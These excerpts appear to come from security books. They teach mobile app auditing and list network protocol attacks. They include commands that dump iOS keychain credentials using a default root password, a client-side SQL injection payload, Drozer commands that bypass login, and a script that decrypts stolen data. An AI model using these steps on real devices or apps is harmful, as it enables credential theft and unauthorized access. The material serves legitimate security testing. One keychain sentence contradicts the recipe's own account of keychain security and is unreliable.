iOS-ScriptDroid gives first-hand information about the various iOS application vulnerabilities present in the current application. For instance, here are a few that are specific to the iOS platform:

- BufferOverflow.txt contains usages of harmful functions with missing buffer limits, such as strcat, strcpy, and so on, found in the application
- URL schemes, if implemented in an insecure manner, may result in access-related vulnerabilities; usage of URL schemes is listed in URLSchemes.txt

These are useful vulnerability details to know in iOS applications via static analysis.

There's more...

The current recipe used just iOS-ScriptDroid, but there are many other options available.
You can either choose to write your own script or use one of the free or commercial tools available. A few commercial tools have pioneered the static analysis approach over the years via their dedicated focus.

See also

- Auditing Android apps using static analysis

Auditing iOS application using a dynamic analyzer

Dynamic analysis is the runtime analysis of an application: the application is run or simulated to discover flaws during runtime. Dynamic analysis can be tricky, especially in the case of mobile platforms. Dynamic analysis is helpful in tampering with data in transmission during runtime, for example, tampering with the amount in a transaction request being sent to a payment gateway. In applications that use custom encryption to prevent attackers from reading the data, dynamic analysis is useful in revealing the encrypted data, which can be reverse-engineered. Note that since iOS applications cannot be decompiled to the full extent, dynamic analysis becomes even more important for finding sensitive data that may have been hardcoded.

Getting ready

For conducting dynamic analysis of iOS applications, we need at least one iOS application and a dynamic code analyzer tool. Pick any iOS application of your choice and use any dynamic analyzer tool of your choice. In this recipe, we use the open source tool Snoop-it. We will use an iOS app that locks files, which can only be opened using a PIN, a pattern, and a secret question and answer to unlock and view the file. Let us see if we can analyze this app and find a security flaw in it using Snoop-it. Please note that Snoop-it only works on jailbroken devices. To install Snoop-it on your iDevice, visit https://code.google.com/p/snoop-it/wiki/GettingStarted?tm=6. We have downloaded Locker Lite from the App Store onto our device for analysis.

How to do it...

Perform the following steps to conduct dynamic analysis of iOS applications:

1. Open the Snoop-it app by tapping on its icon and navigate to Settings. Here you will see the URL through which the interface can be accessed from your machine. Note the URL, for we will be using it soon. We have disabled authentication for our ease.
2. On the iDevice, tap on Applications | Select App Store Apps and select the Locker app.
3. Press the home button and open the Locker app. Note that on entering a wrong PIN, we do not get further access.
4. Making sure the workstation and iDevice are on the same network, open the previously noted URL in any browser.
5. Click on the Objective-C Classes link under Analysis in the left-hand panel.
6. Now, click on SM_LoginManagerController. The class information gets loaded in the panel to the right of it. Navigate down until you see -(void) unlockWasSuccessful and click on the radio button preceding it. This method is now selected.
7. Next, click on the Setup and invoke button at the top-right of the panel. In the window that appears, click on the Invoke Method button at the bottom.
8. As soon as we click on the button, we notice that the authentication has been bypassed, and we can view our locked file successfully.

How it works...

Snoop-it loads all the classes that are in the app and indicates the ones that are currently operational in green. Since we want to bypass the current login screen and load directly into the main page, we look for UIViewController. Inside UIViewController, we see SM_LoginManagerController, which could contain methods relevant to authentication.
On observing the class, we see various methods such as numberLoginSucceed, patternLoginSucceed, and many others. The app calls the unlockWasSuccessful method when a PIN code is entered successfully. So, when we invoke this method from our machine and the function is called directly, the app loads the main page successfully.

There's more...

The current recipe used just one dynamic analyzer, but other options and tools can also be employed. There are many challenges in doing dynamic analysis of iOS applications. You may like to use multiple tools, and not rely on just one, to overcome those challenges.

See also

- https://code.google.com/p/snoop-it/
- Auditing Android apps using a dynamic analyzer

Examining iOS App Data storage and Keychain security vulnerabilities

Keychain in iOS is an encrypted SQLite database that uses a 128-bit AES algorithm to hold identities and passwords. On any iOS device, the Keychain SQLite database is used to store user credentials such as usernames, passwords, encryption keys, certificates, and so on. Developers use this service API to instruct the operating system to store sensitive data securely, rather than using a less secure alternative storage mechanism such as a property list file or a configuration file. In this recipe, we will analyze a Keychain dump to discover stored credentials.

Getting ready

Follow these steps to prepare for Keychain dump analysis:

1. Jailbreak the iPhone or iPad.
2. Ensure the SSH server is running on the device (default after jailbreak).
3. Download the keychain_dumper binary from https://github.com/ptoomey3/Keychain-Dumper
4. Connect the iPhone and the computer to the same Wi-Fi network.
5. On the computer, SSH into the iPhone using the iPhone's IP address, the username root, and the password alpine.

How to do it...

Follow these steps to examine security vulnerabilities in iOS:

1. Copy keychain_dumper onto the iPhone or iPad by issuing the following command:

scp keychain_dumper root@<device ip>:/private/var/tmp

Alternatively, WinSCP on Windows can be used to do the same.

2. Once the binary has been copied, ensure that keychain-2.db has read access:

chmod +r /private/var/Keychains/keychain-2.db

3. Give execute rights to the binary:

chmod 777 /private/var/tmp/keychain_dumper

4. Now, simply run keychain_dumper:

/private/var/tmp/keychain_dumper

This command dumps all keychain information, which will contain all the generic and Internet passwords stored in the keychain.

How it works...

Keychain on an iOS device is used to securely store sensitive information such as credentials (usernames, passwords, authentication tokens for different applications, and so on), along with connectivity (Wi-Fi/VPN) credentials. It is located on iOS devices as an encrypted SQLite database file at /private/var/Keychains/keychain-2.db. Insecurity arises when application developers use this feature of the operating system to store credentials rather than storing them themselves in NSUserDefaults, .plist files, and so on. To provide users the ease of not having to log in every time, and hence saving the credentials on the device itself, the keychain information for every app is stored outside of its sandbox.

There's more...

This analysis can also be performed for specific apps dynamically, using tools such as Snoop-it. Follow the steps to hook Snoop-it to the target app, click on Keychain Values, and analyze the attributes to see their values revealed in the Keychain. More will be discussed in further recipes.
Finding vulnerabilities in WAP-based mobile apps

WAP-based mobile applications are mobile applications or websites that run in mobile browsers. Most organizations create a lightweight version of their complex websites to run easily and appropriately in mobile browsers. For example, a hypothetical company called ABCXYZ may have their main website at www.abcxyz.com, while their mobile website takes the form m.abcxyz.com. Note that the mobile website (or WAP app) is separate from its installable application form, such as an .apk on Android. Since mobile websites run in browsers, it is very logical to say that most of the vulnerabilities applicable to web applications are applicable to WAP apps as well. However, there are caveats: exploitability and risk ratings may not be the same, and not all attacks may be directly applicable or conductible.

Getting ready

For this recipe, make sure you are ready with the following set of tools (in the case of Android):

- ADB
- WinSCP
- PuTTY
- A rooted Android mobile
- An SSH proxy application installed on the Android phone

Let us see the common WAP application vulnerabilities. While discussing these, we will limit ourselves to mobile browsers only:

- Browser cache: Android browsers store cache in two different parts, content cache and component cache. Content cache may contain basic frontend components such as HTML, CSS, or JavaScript. Component cache contains sensitive data such as the details to be populated once the content cache is loaded. You have to locate the browser cache folder and find sensitive data in it.
- Browser memory: Browser memory refers to the location used by browsers to store data. Memory is usually long-term storage, while cache is short-term. Browse through the browser memory space for various files such as .db, .xml, .txt, and so on. Check all these files for the presence of sensitive data.
- Browser history: Browser history contains the list of URLs browsed by the user. These URLs, in GET request format, contain parameters. Again, our goal is to locate a URL with sensitive data for our WAP application.
- Cookies: Cookies are mechanisms for websites to keep track of user sessions. Cookies are stored locally on devices. The security concerns with respect to cookie usage are that a cookie may contain sensitive information, that weak cookie attributes may weaken the application's security, and that cookie stealing may lead to session hijacking.

How to do it...

Browser cache: The Android browser cache can be found at /data/data/com.android.browser/cache/webviewcache/. You can either use ADB to pull the data from webviewcache, or use WinSCP/PuTTY to connect to an SSH application on a rooted Android phone. Either way, you will land in the webviewcache folder and find arbitrarily named files. Rename the extension of these files to .jpg and you will be able to view the cache in screenshot format. Search through all the files for sensitive data pertaining to the WAP app you are testing.

Browser memory: Like an Android application, the browser also has a memory space under the /data/data folder, by the name com.android.browser (the default browser). Make sure you traverse through all the folders to find any useful sensitive data in the context of the WAP application you are looking at.
Browser history: Go to the browser, locate options, navigate to History, and review the URLs present there.

Cookies: The files containing cookie values can be found at /data/data/com.android.browser/databases/webview.db. These DB files can be opened with the SQLite Browser tool and the cookies can be obtained.

There's more...

Apart from the primary vulnerabilities described here, which are mainly concerned with browser usage, all other web application vulnerabilities which are related to, or exploited from or within, a browser are applicable and need to be tested:

- Cross-site scripting, the result of a browser executing unsanitized harmful scripts reflected by the server, is very valid for WAP applications.
- The autocomplete attribute not turned off may result in sensitive data being remembered by the browser for returning users. This again is a source of data leakage.
- Browser thumbnails and image buffers are other places to look for data.

Above all, the web application vulnerabilities that do not relate to browser usage also apply. These include OWASP Top 10 vulnerabilities such as SQL injection attacks, broken authentication and session management, and so on. Business logic validation is another important check to attempt to bypass. All of these tests are possible by setting up a proxy for the browser and playing around with the mobile traffic. The discussion in this recipe has been around Android, but all of it is fully applicable to the iOS platform when testing WAP applications. The approach, the test steps, and the locations would vary, but all the vulnerabilities still apply. You may want to try out the iExplorer and plist editor tools when working with an iPhone or iPad.

See also

- http://resources.infosecinstitute.com/browser-based-vulnerabilities-in-web-applications/

Finding client-side injection

Client-side injection is a new dimension to the mobile threat landscape. Client-side injection (also known as local injection) results from injecting malicious payloads into local storage to reveal data outside the usual workflow of the mobile application. If ' or '1'='1 is injected into a search parameter of a mobile application, where the search functionality is built to query a local SQLite DB file, and this reveals all the data stored in the corresponding table of the SQLite DB, then client-side SQL injection is successful. Notice that the payload did not go to the server-side database (which could be Oracle or MSSQL) but to the local database (SQLite) on the mobile device. Since the injection point and the injectable target are both local (that is, on the mobile device), the attack is called a client-side injection.

Getting ready

To get ready to find client-side injection, have a few mobile applications ready to be audited, along with the tools used in many other recipes throughout this book. Note that client-side injection is not easy to find on account of the complexities involved; many a time you will have to fine-tune your approach based on the first signs of success.

How to do it...

The prerequisites for client-side injection vulnerability in mobile apps are the presence of local storage and an application feature that queries the local storage. For the convenience of this first discussion, let us start with client-side SQL injection, which is fairly easy to grasp for anyone who knows SQL injection in web apps.

Let us take the case of a mobile banking application that stores branch details in a local SQLite database. The application provides a search feature for users wishing to search for a branch; a simplified sketch of such a feature follows.
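Here is a minimal Java sketch of such a vulnerable local search, with a hypothetical table and column name; the parameterized alternative is shown alongside:

import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;

public class BranchSearch {

    // VULNERABLE: user-supplied input is concatenated straight into the SQL
    // string, so a payload such as: x' OR '1'='1
    // returns every row of the local branches table.
    static Cursor searchBranches(SQLiteDatabase db, String city) {
        return db.rawQuery(
                "SELECT * FROM branches WHERE city = '" + city + "'", null);
    }

    // SAFER: a parameterized query prevents the payload from being
    // interpreted as SQL.
    static Cursor searchBranchesSafely(SQLiteDatabase db, String city) {
        return db.rawQuery(
                "SELECT * FROM branches WHERE city = ?", new String[] { city });
    }
}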
Now, if a person types in the city as Mumbai, the city parameter is populated with the value Mumbai and the same is dynamically added to the SQLite query. The query builds and retrieves the branch list for the city of Mumbai. (Usually, purely local features are provided for a faster user experience and network bandwidth conservation.) Now, if a user is able to inject harmful payloads into the city parameter, such as a wildcard character or a SQLite payload to drop a table, and the payload executes, revealing all the details (in the case of a wildcard) or dropping the table from the DB (in the case of a drop table payload), then you have successfully exploited client-side SQL injection.

Another type of client-side injection, presented in the OWASP Mobile Top 10 release, is local cross-site scripting (XSS). Refer to slide number 22 of the original OWASP presentation here: http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks. They referred to it as Garden Variety XSS and presented a code snippet wherein SMS text was accepted locally and printed at the UI. If a script was input in the SMS text, it would result in local XSS (JavaScript injection).

There's more...

In a similar fashion, HTML injection is also possible. If an HTML file contained in the application's local storage can be compromised to contain malicious code, and the application has a feature which loads or executes this HTML file, HTML injection is possible locally. A variant of the same may result in Local File Inclusion (LFI) attacks. If data is stored in the form of XML files on the mobile device, local XML injection can also be attempted. More variants of these attacks may be possible.

Finding client-side injection is quite difficult and time-consuming. It may require both static and dynamic analysis approaches. Most scanners do not support the discovery of client-side injection either. Another dimension of client-side injection is its impact, which is judged to be low in most cases. There is a strong counter-argument to this vulnerability: if the entire local storage can be obtained easily in Android, why conduct client-side injection at all? I agree with this argument in most cases; since the entire SQLite or XML file can be stolen from the phone, why spend time searching for a variable that accepts a wildcard to reveal the data from the same file? However, you should still look out for this vulnerability, as HTML injection or LFI-style attacks allow the insertion of malware-corrupted files, and hence an impactful attack. Also, there are platforms such as iOS where stealing the local storage is sometimes very difficult; in such cases, client-side injection may come in handy.

See also

- https://www.owasp.org/index.php/Mobile_Top_10_2014-M7
- http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks

Insecure encryption in mobile apps

Encryption is one of the most misused terms in information security. Some people confuse it with hashing, while others may implement encoding and call it encryption. Symmetric key and asymmetric key are the two types of encryption schemes. Mobile applications implement encryption to protect sensitive data in storage and in transit. While doing audits, your goal should be to uncover weak encryption implementations, or the so-called encoding or other weaker forms implemented where proper encryption should have been used. Try to circumvent the encryption implemented in the mobile application under audit.
Getting ready

Be ready with a few mobile applications and tools such as ADB, file and memory readers, decompilers, decoding tools, and so on.

How to do it...

There are multiple types of faulty encryption implementation in mobile applications, and different ways to discover each of them:

- Encoding (instead of encryption): Many a time, mobile app developers simply implement Base64 or URL encoding in applications (an example of security by obscurity). Such encoding can be discovered simply by doing static analysis; you can use the script discussed in the first recipe of this article to find such encoding algorithms. Dynamic analysis will help you obtain the locally stored data in encoded format. Decoders for these well-known encoding algorithms are freely available, and with any of them you will be able to uncover the original value. Thus, such an implementation is not a substitute for encryption.
- Serialization (instead of encryption): Another variation of faulty implementation is serialization, the process of converting data objects into a byte stream. The reverse process, deserialization, is also very simple, and the original data can be obtained easily. Static analysis may help reveal implementations using serialization.
- Obfuscation (instead of encryption): Obfuscation suffers from similar problems; obfuscated values can be deobfuscated.
- Hashing (instead of encryption): Hashing is a one-way process using a standard complex algorithm. These one-way hashes suffer from a major problem: they can be replayed (without needing to recover the original data). Also, rainbow tables can be used to crack the hashes. Like the other techniques described previously, hashing usage in mobile applications can be discovered via static analysis. Dynamic analysis may additionally be employed to reveal the one-way hashes stored locally.

How it works...

To understand insecure encryption in mobile applications, let us take a live case that we observed: an example of a weak custom implementation. While testing a live mobile banking application, my colleagues and I came across a scenario where a userid and mpin combination was sent using custom encoding logic. The encoding logic here was a character-by-character replacement, as per a predefined built-in mapping. For example:

- 2 is replaced by 4
- 0 is replaced by 3
- 3 is replaced by 2
- 7 is replaced by =
- a is replaced by R
- A is replaced by N

As you can see, there is no logic to the replacement. Until you uncover or decipher the whole built-in mapping, you won't succeed. A simple technique is to supply all possible characters one by one and watch the responses. Let's input a userid and PIN of 222222 and 2222 and notice that the converted userid and PIN are 444444 and 4444, respectively, as per the mapping above. Go ahead and keep changing the inputs, and you will recreate the full mapping used by the application. Now steal the user's encoded data and apply the mapping, thereby uncovering the original data. This whole approach is nicely described in the article mentioned in the See also section of this recipe. (A toy sketch of such a substitution "encoder" follows.)

This is a custom example of a faulty implementation pertaining to encryption. Such kinds of faults are often difficult to find in static analysis, especially for hard-to-reverse apps such as iOS applications. It is also difficult for automated dynamic analysis to discover this.
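To make the idea concrete, here is a toy sketch of such a character-substitution encoder in Java, using only the handful of mappings quoted above; the real application had a full character map, so this is purely illustrative:

import java.util.HashMap;
import java.util.Map;

public class SubstitutionEncoder {

    // Partial mapping reconstructed from the observed behavior;
    // the real app had an entry for every character.
    private static final Map<Character, Character> MAP = new HashMap<>();
    static {
        MAP.put('2', '4');
        MAP.put('0', '3');
        MAP.put('3', '2');
        MAP.put('7', '=');
        MAP.put('a', 'R');
        MAP.put('A', 'N');
    }

    // "Encodes" input character by character: no key, no secrecy,
    // so feeding in chosen inputs (222222 -> 444444) recovers the map.
    static String encode(String input) {
        StringBuilder out = new StringBuilder();
        for (char c : input.toCharArray()) {
            out.append(MAP.getOrDefault(c, c));
        }
        return out.toString();
    }

    public static void main(String[] args) {
        System.out.println(encode("222222")); // prints 444444
        System.out.println(encode("2222"));   // prints 4444
    }
}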
Manual testing and analysis, along with dynamic or automated analysis, stands a better chance of uncovering such custom implementations.

There's more...

Finally, I will share another application we came across. This one used proper encryption: the algorithm was a well-known, secure one, and the key was strong. Still, the whole encryption process could be reversed. The application made two mistakes, and we combined both of them to break the encryption:

- The application code carried the standard encryption algorithm in the APK bundle. Not even obfuscation was used to protect at least the names. We used the simple process of APK to DEX to JAR conversion to uncover the algorithm details.
- The application stored the strong encryption key in a local XML file under the /data/data folder of the Android device. We used adb to read this XML file and hence obtained the encryption key.

According to Kerckhoffs' principle, the security of a cryptosystem should depend solely on the secrecy of the key and the private randomizer. This is how all encryption algorithms are implemented: the key is the secret, not the algorithm. In our scenario, we could obtain the key and we knew the name of the encryption algorithm. This is enough to break a strong encryption implementation.
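To illustrate, once the algorithm and the key are known, reversing such "strong" encryption takes only a few lines. The following Python sketch assumes, purely for illustration, that the recovered key drives AES in CBC mode with a prepended IV and PKCS#7 padding, and it uses the third-party pycryptodome package:

from Crypto.Cipher import AES  # pip install pycryptodome

def decrypt_stolen_record(blob, key):
    # Assumed layout: the first 16 bytes are the IV, the rest is ciphertext.
    iv, ciphertext = blob[:16], blob[16:]
    plaintext = AES.new(key, AES.MODE_CBC, iv).decrypt(ciphertext)
    return plaintext[:-plaintext[-1]]  # strip PKCS#7 padding

# key:  read with adb from the XML file under /data/data/<package>/
# blob: the encrypted record pulled from the same local storage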
See also

http://www.paladion.net/index.php/mobile-phone-data-encryption-why-is-it-necessary/

Discovering data leakage sources

Data leakage risk worries organizations across the globe, and people have been implementing solutions to prevent it. In the case of mobile applications, we first have to think about the possible sources or channels of data leakage. Once this is clear, devise or adopt a technique to uncover each of them.

Getting ready

As in other recipes, here also you need a bunch of applications (to be analyzed), an Android device or emulator, ADB, a DEX to JAR converter, Java decompilers, and WinRAR or WinZip.

How to do it...

To identify the data leakage sources, list all the possible sources you can think of for the mobile application under audit. In general, all mobile applications have the following channels of potential data leakage:

- Files stored locally
- Client-side source code
- Mobile device logs
- Web caches
- Console messages
- Keystrokes
- Sensitive data sent over HTTP

How it works...

The next step is to uncover data leakage vulnerabilities in these potential channels. Let us look at the seven previously identified common channels:

- Files stored locally: By this time, readers are very familiar with this. Data is stored locally in files such as shared preferences, XML files, SQLite DBs, and other files. In Android, these are located inside the application folder under the /data/data directory and can be read using tools such as ADB. In iOS, tools such as iExplorer or SSH can be used to read the application folder.
- Client-side source code: The mobile application source code is present locally on the mobile device itself. Source code in applications has been known to hardcode data, and a common mistake is hardcoding sensitive data (either knowingly or unknowingly). From the field, we came across an application that had hardcoded the connection key to the connected PoS terminal. Hardcoded formulas to calculate a certain figure, which should ideally have been present in the server-side code, have also been found in mobile apps. Database instance names and credentials are another possibility where the mobile app directly connects to a server datastore. In Android, the source code is quite easy to decompile via a two-step process: APK to DEX and DEX to JAR conversion. In iOS, the source code of header files can be decompiled up to a certain level using tools such as classdump-z or otool. Once the raw source code is available, a static string search can be employed to discover sensitive data in the code.
- Mobile device logs: All devices create local logs to store crash and other information, which can be used to debug or analyze a security violation. Poor coding may put sensitive data in local logs, and hence data can be leaked from here as well. The Android ADB command adb logcat can be used to read the logs on Android devices. If you use the same ADB command on the Vulnerable Bank application, you will notice the user credentials in the logs, as shown in the following screenshot. (A small script that automates this check appears at the end of this recipe.)
- Web caches: Web caches may also contain sensitive data related to the web components used in mobile apps. We discussed how to discover this in the WAP recipe earlier in this article.
- Console messages: Console messages are used by developers to print messages to the console while application development and debugging is in progress. Console messages, if not turned off when the application is launched (GO LIVE), may be another source of data leakage. Console messages can be checked by running the application in debug mode.
- Keystrokes: Certain mobile platforms have been known to cache keystrokes. Malware or a keystroke logger may take advantage of this and steal a user's keystrokes, making it another data leakage source. Malware analysis needs to be performed to uncover embedded or pre-shipped malware or keystroke loggers in the application. Dynamic analysis also helps.
- Sensitive data sent over HTTP: Applications either send sensitive data over HTTP or use a weak implementation of SSL. In either case, sensitive data leakage is possible. Usage of HTTP can be found via static analysis by searching for HTTP strings. Dynamic analysis, capturing the packets at runtime, also reveals whether traffic travels over HTTP or HTTPS. There are various weak SSL implementations and downgrade attacks, which make data vulnerable to sniffing and hence to leakage.

There's more...

Data leakage sources can be vast, and listing all of them does not seem possible. Sometimes there are application- or platform-specific data leakage sources, which may call for a different kind of analysis:

- Intent injection can be used to fire intents to access privileged contents. Such intents may steal protected data, such as the personal information of all the patients in a hospital (under HIPAA compliance).
- iOS screenshot backgrounding issues, where iOS applications store screenshots with populated user input data on the iPhone or iPad when the application enters the background. Imagine such screenshots, containing a user's credit card details, CVV, expiry date, and so on, being found in an application under PCI DSS compliance.
- Malware gives a totally different angle to data leakage.

Note that data leakage is a very big risk that organizations are tackling today. The losses are not just financial; they may be intangible, such as reputation damage, or compliance or regulatory violations. Hence, it is very important to identify the maximum possible data leakage sources in the application and rectify the potential leakages.
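As mentioned under the mobile device logs channel above, screening adb logcat output can be automated. This Python sketch shells out to adb (assumed to be on the PATH) and flags log lines containing an illustrative list of credential keywords:

import subprocess

KEYWORDS = ('password', 'passwd', 'pin', 'token', 'secret')  # illustrative list

# -d dumps the current log buffer and exits instead of streaming forever.
logs = subprocess.run(['adb', 'logcat', '-d'],
                      capture_output=True, text=True).stdout

for line in logs.splitlines():
    if any(keyword in line.lower() for keyword in KEYWORDS):
        print(line)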
See also

https://www.owasp.org/index.php/Mobile_Top_10_2014-M4
Launching intent injection in Android

Other application-based attacks in mobile devices

When we talk about application-based attacks, the OWASP Top 10 risks are the first things that come to mind. OWASP (www.owasp.org) has a project dedicated to mobile security, which releases the Mobile Top 10. OWASP gathers data from industry experts and ranks the top 10 risks every three years. It is a very good knowledge base for mobile application security. Here is the latest Mobile Top 10, released in the year 2014:

- M1: Weak Server Side Controls
- M2: Insecure Data Storage
- M3: Insufficient Transport Layer Protection
- M4: Unintended Data Leakage
- M5: Poor Authorization and Authentication
- M6: Broken Cryptography
- M7: Client Side Injection
- M8: Security Decisions via Untrusted Inputs
- M9: Improper Session Handling
- M10: Lack of Binary Protections

Getting ready

Have a few applications ready to be analyzed, and use the same set of tools we have been discussing till now.

How to do it...

In this recipe, we restrict ourselves to the remaining application attacks. The attacks we have not covered till now in this book are:

- M1: Weak Server Side Controls
- M5: Poor Authorization and Authentication
- M8: Security Decisions via Untrusted Inputs
- M9: Improper Session Handling

How it works...

Here, let us discuss the client-side or mobile-side issues for M5, M8, and M9.

M5: Poor Authorization and Authentication

A few common scenarios that can be attacked are:

- Authentication implemented at the device level (for example, a PIN stored locally)
- Authentication bound to poor parameters (such as UDID or IMEI numbers)
- An authorization parameter, responsible for access to protected application menus, being stored locally

These can be attacked by reading data using ADB, decompiling the applications and conducting static analysis on them, or by doing dynamic analysis of the outgoing traffic.

M8: Security Decisions via Untrusted Inputs

This risk concerns IPC. IPC entry points through which applications communicate with one another, such as intents in Android or URL schemes in iOS, are vulnerable. If the originating source is not validated, the application can be attacked. Malicious intents can be fired to bypass authorization or steal data; we discuss this in further detail in the next recipe. URL schemes are a way for applications to specify the launch of certain components. For example, the mailto scheme in iOS is used to create a new e-mail. If an application fails to specify the acceptable sources, any malicious application will be able to send a mailto scheme to the victim application and create new e-mails.

M9: Improper Session Handling

From a purely mobile device perspective, session tokens stored in .db files, OAuth tokens, or access-granting strings stored in weakly protected files are vulnerable. These can be obtained by reading the local data folder using ADB.

See also

https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks

Launching intent injection in Android

Android uses intents to request an action from another application component. A common communication is passing an Intent to start a service. We will exploit this fact via an intent injection attack. An intent injection attack works by injecting an intent into an application component to perform a task that is usually not allowed by the application workflow.
For example, suppose an Android application has a login activity that, post successful authentication, gives access to protected data via another activity. If an attacker can invoke that internal activity directly to access the protected data by passing an Intent, it is an intent injection attack.

Getting ready

Install Drozer by downloading it from https://www.mwrinfosecurity.com/products/drozer/ and following the installation instructions mentioned in the User Guide. Install the Drozer Console Agent and start a session as mentioned in the User Guide. If your installation is correct, you should get a Drozer command prompt (dz>).

How to do it...

You should also have a few vulnerable applications to analyze. Here we chose the OWASP GoatDroid application:

1. Start the OWASP GoatDroid FourGoats application in the emulator. Browse the application to develop an understanding of it. Note that you are required to authenticate by providing a username and password, and post-authentication you can access the profile and other pages. Here is the pre-login screen you get:
2. Let us now use Drozer to analyze the activities of the FourGoats application. The following Drozer command is helpful:

run app.activity.info -a <package name>

3. Drozer detects four activities with null permission. Out of these four, ViewCheckin and ViewProfile are post-login activities. Use Drozer to access these two activities directly, via the following command:

run app.activity.start --component <package name> <activity name>

4. We chose to access the ViewProfile activity, and the entire sequence of activities is shown in the following screenshot:
5. Drozer performs some actions, and the protected user profile opens up in the emulator, as shown here:

How it works...

Drozer passed an Intent in the background to invoke the post-login activity ViewProfile. This resulted in the ViewProfile activity performing an action and displaying the profile screen. This way, an intent injection attack can be performed using the Drozer framework.

There's more...

Android also uses intents for starting a service or delivering a broadcast, so intent injection attacks can likewise be performed on services and broadcast receivers. The Drozer framework can also be used to launch attacks on these app components. Attackers may write their own attack scripts or use different frameworks to launch this attack.

See also

- Using Drozer to find vulnerabilities in Android applications
- https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
- https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf

Resources for Article:

Further resources on this subject:
- Mobile Devices [article]
- Development of Windows Mobile Applications (Part 1) [article]
- Development of Windows Mobile Applications (Part 2) [article]
Communication and Network Security

Packt
21 Jun 2016
7 min read
In this article by M. L. Srinivasan, the author of the book CISSP in 21 Days, Second Edition, we cover the communication and network security domain, which deals with the security of voice and data communications through local area, wide area, and remote access networking. Candidates are expected to have knowledge in the areas of secure communications; securing networks; threats, vulnerabilities, attacks, and countermeasures to communication networks; and protocols that are used in remote access.

(For more resources related to this topic, see here.)

Observe the following diagram. It represents the seven layers of the OSI model. This article covers protocols and security in the fourth layer, which is the Transport layer:

Transport layer protocols and security

The Transport layer does two things. One is to pack the data given out by applications into a format that is suitable for transport over the network, and the other is to unpack the data received from the network into a format suitable for applications. In this layer, some of the important protocols are Transmission Control Protocol (TCP), User Datagram Protocol (UDP), Stream Control Transmission Protocol (SCTP), Datagram Congestion Control Protocol (DCCP), and Fiber Channel Protocol (FCP). The process of packaging the data received from the applications is called encapsulation, and the output of such a process is called a datagram. Similarly, the process of unpacking the datagram received from the network is called decapsulation. When moving from the seventh layer down to the fourth one, the fourth layer's header is placed on the data, and it becomes a datagram. When the datagram is encapsulated with the third layer's header, it becomes a packet; when the packet is encapsulated with the second layer's header, it becomes a frame, which is put on the wire as bits. The following section describes some of the important protocols in this layer, along with security concerns and countermeasures.

Transmission Control Protocol (TCP)

TCP is a core Internet protocol that provides reliable delivery mechanisms over the Internet. TCP is a connection-oriented protocol. A protocol that guarantees the delivery of datagrams (packets) to the destination application by way of a suitable mechanism (for example, the three-way handshake of SYN, SYN-ACK, and ACK in TCP) is called a connection-oriented protocol. The reliability of datagram delivery in such a protocol is high due to the acknowledgment by the receiver. This protocol has two primary functions: the transmission of datagrams between applications, and the controls that are necessary for ensuring reliable transmissions. Applications where delivery needs to be assured, such as e-mail, the World Wide Web (WWW), file transfer, and so on, use TCP for transmission.

Threats, vulnerabilities, attacks, and countermeasures

One of the common threats to TCP is service disruption. A common vulnerability is half-open connections exhausting server resources. Denial of Service attacks such as TCP SYN attacks, as well as connection hijacking such as IP spoofing attacks, are possible. A half-open connection is a vulnerability in the TCP implementation. TCP uses a three-way handshake to establish or terminate connections. Refer to the following diagram: in a three-way handshake, the client (workstation) first sends a request to the server (for example, www.SomeWebsite.com). This is called a SYN request. The server acknowledges the request by sending a SYN-ACK and, in the process, creates a buffer for this connection. The client completes the handshake with a final ACK. TCP requires this setup, since the protocol needs to ensure the reliability of packet delivery. If the client does not send the final ACK, the connection is called half open. Since the server has created a buffer for that connection, a certain amount of memory or server resource is consumed. If thousands of such half-open connections are created maliciously, the server resources may be completely consumed, resulting in a Denial-of-Service to legitimate requests.

TCP SYN attacks work by establishing thousands of half-open connections to consume the server resources. There are two actions an attacker might take. One is that the attacker or malicious software sends thousands of SYNs to the server and withholds the ACK; this is called SYN flooding. Depending on the capacity of the network bandwidth and the server resources, all the resources will be consumed over a span of time, resulting in a Denial-of-Service. If the source IP is blocked by some means, the attacker or the malicious software will try to spoof the source IP addresses to continue the attack; this is called SYN spoofing.

SYN attacks such as SYN flooding and SYN spoofing can be controlled using SYN cookies with cryptographic hash functions. In this method, the server does not create the connection at the SYN-ACK stage. Instead, the server creates a cookie from a computed hash of the source IP address, source port, destination IP, destination port, and some random values based on the algorithm, and sends it in the SYN-ACK. When the server receives the ACK, it checks the details and only then creates the connection.

A cookie is a piece of information, usually in the form of a text file, sent by a server to a client. Cookies are generally stored on a browser's disk or client computers, and they are used for purposes such as authentication, session tracking, and management.
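The hash computation behind a SYN cookie can be sketched as follows. Real TCP stacks pack more into the value (Linux, for example, also encodes the client's MSS), so the field layout and the secret below are purely illustrative:

import hashlib, os, time

SECRET = os.urandom(16)  # server-side secret, rotated periodically

def syn_cookie(src_ip, src_port, dst_ip, dst_port, client_isn):
    # Hash the connection 4-tuple, the client's initial sequence number,
    # and a coarse timestamp; the result becomes the server's own
    # initial sequence number in the SYN-ACK.
    window = int(time.time()) >> 6  # 64-second validity window
    data = f"{src_ip}|{src_port}|{dst_ip}|{dst_port}|{client_isn}|{window}"
    digest = hashlib.sha256(SECRET + data.encode()).digest()
    return int.from_bytes(digest[:4], "big")

When the final ACK arrives, the server recomputes the cookie from the packet headers and compares it with the acknowledged sequence number; only on a match is the connection actually created, so no state is stored at SYN time.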
User Datagram Protocol (UDP)

UDP is a connectionless protocol similar to TCP; however, UDP does not guarantee the delivery of data packets. A protocol that does not guarantee the delivery of datagrams (packets) to the destination is called a connectionless protocol. In other words, the final acknowledgment is not mandatory in UDP. UDP uses one-way communication, so the delivery speed of datagrams is high. UDP is predominantly used where the loss of intermittent packets is acceptable, such as in video or audio streaming.

Threats, vulnerabilities, attacks, and countermeasures

Service disruptions are common threats, and validation weaknesses facilitate such threats. UDP flood attacks cause service disruptions, and controlling the UDP packet size acts as a countermeasure to such attacks.

Internet Control Message Protocol (ICMP)

ICMP is used to discover service availability in network devices, servers, and so on. ICMP expects response messages from devices or systems to confirm service availability.

Threats, vulnerabilities, attacks, and countermeasures

Service disruptions are common threats, and validation weaknesses facilitate them. ICMP attacks, such as floods and the ping of death, cause service disruptions, and controlling the ICMP packet size acts as a countermeasure to such attacks.

Pinging is the process of sending an Internet Control Message Protocol (ICMP) ECHO_REQUEST message to servers or hosts to check whether they are up and running.
